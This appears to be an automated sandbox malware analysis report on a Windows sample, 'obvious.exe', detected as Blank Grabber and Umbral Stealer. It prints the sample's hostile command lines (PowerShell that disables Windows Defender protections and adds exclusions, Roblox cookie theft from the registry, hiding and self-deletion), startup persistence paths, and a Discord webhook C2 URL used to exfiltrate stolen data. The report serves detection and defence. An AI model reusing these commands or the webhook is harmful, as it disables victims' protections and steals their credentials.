Windows Analysis Report
obvious.exe

Overview

General Information

Sample name: obvious.exe
Analysis ID: 1500039
MD5: eabe2a81aa3dabab25e49ee4b36ce075
SHA1: f55b6298f0a8330d90d39e20a73adb2e828dfd1c
SHA256: 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686
Tags: exe

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • obvious.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\obvious.exe" MD5: EABE2A81AA3DABAB25E49EE4B36CE075)
    • WMIC.exe (PID: 7632 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7728 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7772 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7920 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 8012 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8132 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7212 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7676 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7788 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3744 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7840 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5016 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3412 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5444 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Extracted malware configuration (Umbral Stealer): {"C2 url": "https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX", "Version": "v1.3"}
Source | Rule | Description | Author | Strings
obvious.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
obvious.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
obvious.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31884:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aa6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31884:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aa6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
Process Memory Space: obvious.exe PID: 7532 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
0.0.obvious.exe.12f5f5a0000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
0.0.obvious.exe.12f5f5a0000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
0.0.obvious.exe.12f5f5a0000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31884:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aa6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', ProcessId: 7772, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 8012, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', ProcessId: 7772, ProcessName: powershell.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\obvious.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\obvious.exe", ParentImage: C:\Users\user\Desktop\obvious.exe, ParentProcessId: 7532, ParentProcessName: obvious.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe', ProcessId: 7772, ProcessName: powershell.exe
Timestamp: 2024-08-27T20:06:02.729156+0200
SID: 2045593
Severity: 1
Source Port: 49740
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-08-27T20:05:38.509069+0200
SID: 2803305
Severity: 3
Source Port: 49738
Destination Port: 80
Protocol: TCP
Classtype: Unknown Traffic

AV Detection

Source: obvious.exe | Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: obvious.exe | Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX", "Version": "v1.3"}
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | ReversingLabs: Detection: 78%
Source: obvious.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr | Joe Sandbox ML: detected
Source: obvious.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC9378C CryptUnprotectData,0_2_00007FFD9BC9378C
Source: obvious.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: obvious.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.4:49740 -> 162.159.136.232:443
Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
Source: Yara match | File source: Process Memory Space: obvious.exe PID: 7532, type: MEMORYSTR
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 208.95.112.1:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1 | Accept: application/json | User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 | Content-Type: application/json; charset=utf-8 | Host: discord.com | Content-Length: 939 | Expect: 100-continue | Connection: Keep-Alive
Source: powershell.exe, 00000005.00000002.1775176597.000001E0C1DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F616BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F615E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: obvious.exe, uGCIY.scr.0.dr | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fields=225545P
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: obvious.exe, uGCIY.scr.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BE9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=
Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: uGCIY.scr.0.dr | String found in binary or memory: https://discord.com/api/v10/users/
Source: obvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ
Source: obvious.exe, uGCIY.scr.0.dr | String found in binary or memory: https://discordapp.com/api/v9/users/
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/?lfhs=2
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/J
